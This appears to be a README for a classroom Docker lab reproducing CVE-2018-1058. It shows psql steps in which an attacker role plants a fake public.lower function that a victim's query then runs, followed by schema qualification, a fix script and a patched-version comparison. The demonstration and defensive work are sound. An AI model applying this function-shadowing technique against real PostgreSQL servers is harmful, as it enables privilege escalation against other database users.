## https://sploitus.com/exploit?id=F271E10E-74F6-5C2A-953B-E052B8E053FC
# CVE-2018-1058 โ PostgreSQL Search Path Demonstration
This repository contains the reproducibility artifacts for the report:
**CVE-2018-1058: Privilege Escalation in PostgreSQL through Uncontrolled Search Path**
The goal is to demonstrate the search-path trust failure behind CVE-2018-1058 using a safe local Docker environment.
The demo does **not** reproduce a destructive `pg_dump` exploit. Instead, it reproduces the same root cause described in PostgreSQL guidance: an attacker-writable schema contains a look-alike object, and another session resolves an unqualified name to that object.
---
## 1. Contents
```text
.
โโโ report.pdf
โโโ docker-compose.yml
โโโ README.md
โโโ scripts/
โโโ init.sql
โโโ init_safe.sql
โโโ exploit.sql
โโโ victim_query.sql
โโโ verify_qualify.sql
โโโ fix.sql
```
The final report is `report.pdf`.
No `Dockerfile` is required. The project uses official `postgres` images.
The screenshots are embedded directly in `report.pdf`, so they are not provided as separate image files.
## 2. Requirements
Install:
- Docker
- Docker Compose
- `psql` client, optional but recommended
The demo uses two PostgreSQL containers:
| Service | Version | Container name | Host port | Purpose |
| --- | --- | --- | --- | --- |
| `pg_vulnerable` | PostgreSQL 10.2 | `cve1058_pg_vulnerable` | `15432` | vulnerable demonstration |
| `pg_fixed` | PostgreSQL 10.3 | `cve1058_pg_fixed` | `15433` | patched/hardened comparison |
Make sure ports `15432` and `15433` are free.
## 3. Start the vulnerable environment
```bash
docker compose up -d pg_vulnerable
docker compose ps
```
Expected result: service `pg_vulnerable` should be running and mapped to port `15432`.
Check the PostgreSQL version:
```bash
docker exec -it cve1058_pg_vulnerable psql -U postgres -d demo_cve1058 -c "SELECT version();"
```
Expected result: PostgreSQL 10.2.
## 4. Inspect database roles
```bash
docker exec -it cve1058_pg_vulnerable psql -U postgres -d demo_cve1058 -c "\du"
```
Expected roles:
- `postgres`
- `attacker`
- `victim`
The attacker is not a PostgreSQL superuser.
## 5. Run the exploit
Run the attacker script:
```bash
PGPASSWORD='AttackerPw!ChangeMe' \
psql -h 127.0.0.1 -p 15432 -U attacker -d demo_cve1058 \
-v ON_ERROR_STOP=1 -f scripts/exploit.sql
```
Expected output:
```text
CREATE TABLE
GRANT
GRANT
CREATE FUNCTION
```
This creates:
- a harmless `public.exploit_log` table;
- a fake `public.lower(varchar)` function.
## 6. Trigger the vulnerable behaviour as victim
```bash
PGPASSWORD='VictimPw!ChangeMe' \
psql -h 127.0.0.1 -p 15432 -U victim -d demo_cve1058 \
-v ON_ERROR_STOP=1 -f scripts/victim_query.sql
```
Expected output:
```text
CVE-2018-1058 DEMO: Alice Demo
CVE-2018-1058 DEMO: Bob Demo
```
This shows that the victim's normal query resolved `lower(...)` to the attacker-controlled function.
## 7. Confirm the side effect
```bash
PGPASSWORD='AttackerPw!ChangeMe' \
psql -h 127.0.0.1 -p 15432 -U attacker -d demo_cve1058 \
-c "TABLE public.exploit_log;"
```
Expected result: rows showing that the fake function was executed.
## 8. Show defensive qualification
```bash
PGPASSWORD='VictimPw!ChangeMe' \
psql -h 127.0.0.1 -p 15432 -U victim -d demo_cve1058 \
-v ON_ERROR_STOP=1 -f scripts/verify_qualify.sql
```
Expected output:
```text
alice demo
bob demo
```
This works because `pg_catalog.lower(...)` forces PostgreSQL to use the built-in function.
## 9. Apply the fix on the vulnerable container
```bash
PGPASSWORD='postgres' \
psql -h 127.0.0.1 -p 15432 -U postgres -d demo_cve1058 \
-v ON_ERROR_STOP=1 -f scripts/fix.sql
```
Expected output may include:
```text
DROP FUNCTION
DROP TABLE
REVOKE
REVOKE
```
Then rerun the victim query:
```bash
PGPASSWORD='VictimPw!ChangeMe' \
psql -h 127.0.0.1 -p 15432 -U victim -d demo_cve1058 \
-v ON_ERROR_STOP=1 -f scripts/victim_query.sql
```
Expected output:
```text
alice demo
bob demo
```
The attacker-controlled function is gone, and the query returns normal lowercase strings.
## 10. Start the hardened environment
```bash
docker compose up -d pg_fixed
docker compose ps
```
Check the version:
```bash
docker exec -it cve1058_pg_fixed psql -U postgres -d demo_cve1058 -c "SELECT version();"
```
Expected result: PostgreSQL 10.3.
## 11. Verify that the exploit fails on the hardened environment
```bash
PGPASSWORD='AttackerPw!ChangeMe' \
psql -h 127.0.0.1 -p 15433 -U attacker -d demo_cve1058 \
-v ON_ERROR_STOP=1 -f scripts/exploit.sql
```
Expected output:
```text
ERROR: permission denied for schema public
```
This means the attacker cannot create the fake function in `public`, so the attack chain stops before name resolution.
## 12. Cleanup
To stop the containers:
```bash
docker compose down
```
To remove volumes and reset the project completely:
```bash
docker compose down -v
```
## 13. Notes
This demo is intentionally harmless. It does not steal data, access files, or execute operating-system commands.
The exploit uses a visible string prefix and a log table to prove that PostgreSQL resolved an unqualified function name to an attacker-controlled object.
The official CVE concerns `pg_dump` and other client applications. This repository demonstrates the same search-path trust failure in a safe and reproducible classroom setting.
## 14. References
- PostgreSQL CVE-2018-1058 advisory:
- PostgreSQL Wiki, *A Guide to CVE-2018-1058*:
- PostgreSQL 10.3 release notes:
- NVD CVE-2018-1058:
- MITRE CVE-2018-1058: